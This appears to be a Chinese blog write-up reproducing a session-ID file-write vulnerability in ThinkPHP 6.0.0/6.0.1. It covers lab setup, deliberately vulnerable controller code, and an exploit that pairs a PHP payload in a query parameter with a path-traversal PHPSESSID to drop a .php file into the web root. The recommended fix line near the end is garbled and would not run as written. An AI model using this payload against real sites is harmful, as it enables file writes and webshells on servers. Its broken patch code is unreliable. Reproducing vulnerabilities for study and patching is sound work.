ThinkPHP6.0任意文件上传 PHPSESSION 已亲自复现

ThinkPHP6.0任意文件上传 PHPSESSION 已亲自复现

漏洞名称

漏洞描述

2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。

影响版本

ThinkPHP 6.0.0

ThinkPHP 6.0.1

漏洞复现

环境搭建

受害者IP:192.168.10.145

攻击者IP:127.0.0.1

安装thinkphp6

下载PHPstudy_pro,网上一堆自己找吧,链接不推了。

利用PHPStudy_pro对环境进行安装Composer2.5.8

创建网站,域名think6,会在think6目录下生成.htaccess文件和nginx.htaccess文件,将这两个文件移动到上个目录,也就是www目录下。

打开composer,composer2.5.8,php>=7.2


在www目录下面执行这个命令

bash 复制代码
cd ../
composer create-project topthink/think think6(think6自定义,这个会生成一个文件夹)  

将 think6/composer.json 文件的 "topthink/framework": "^6.0.0" 改成 6.0.0 版本,并执行更新命令

bash 复制代码
进入tp6目录
cd tp6
composer update

在本地访问网站为6.0.0,则成功搭建。

漏洞信息配置

构造位置:think6\app\controller\Index.php

需要增加构造的内容:

bash 复制代码
use think\facade\Session;
session::set('demo',$_GET['c']);

/think6/app/middleware.php 文件开启session,去掉注释session的//

漏洞利用

构造参数c和phpsessid;

bash 复制代码
index?c=<?php phpinfo();?>
PHPSESSID=../../../../public/1omg12377.php

访问public目录下的1omg12377.php文件。

修复建议

官方修复建议:对session id 加一个过滤,使用ctype_alnum()

bash 复制代码
$this->id = is_string($id) && strlen($id) === 32 ctype_alnum($id) && ? $id : md5(microtime(true) . session_create_id());
相关推荐
网络安全许木2 小时前
自学渗透测试第20天(防火墙基础与规则配置)
运维·服务器·网络·网络安全·渗透测试
Chengbei114 小时前
业务视角下的金融SRC快速挖掘思路
网络·安全·web安全·网络安全·金融·系统安全·网络攻击模型
姬成韶4 小时前
BUUCTF--[网鼎杯 2020 朱雀组]phpweb
web安全·网络安全·代码审计
兄弟加油,别颓废了。4 小时前
PHPstudy安装靶场
网络安全
一名优秀的码农4 小时前
vulhub系列-73-RA1NXing Bots(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Y学院5 小时前
隐蔽防线,智护互联——网络安全隧道技术的核心价值与实践应用
web安全·网络安全
一袋米扛几楼985 小时前
【密码学】公钥密码学 Public-Key Cryptography,为什么需要公钥密码?
网络安全
深邃-5 小时前
【Web安全】-Kali,Linux基础:Kali系统安装,Kali鼠标不显示(版本问题),Linux系统介绍(1)
linux·计算机网络·安全·web安全·网络安全·系统安全·网络攻击模型
深邃-6 小时前
【Web安全】-Kali,Linux基础:Linux终端介绍,Linux文件操作,Linux文件编辑(2)
linux·计算机网络·安全·web安全·网络安全·系统安全·安全威胁分析
你觉得脆皮鸡好吃吗6 小时前
什么是SQL注入(入门详解)
数据库·sql·网络安全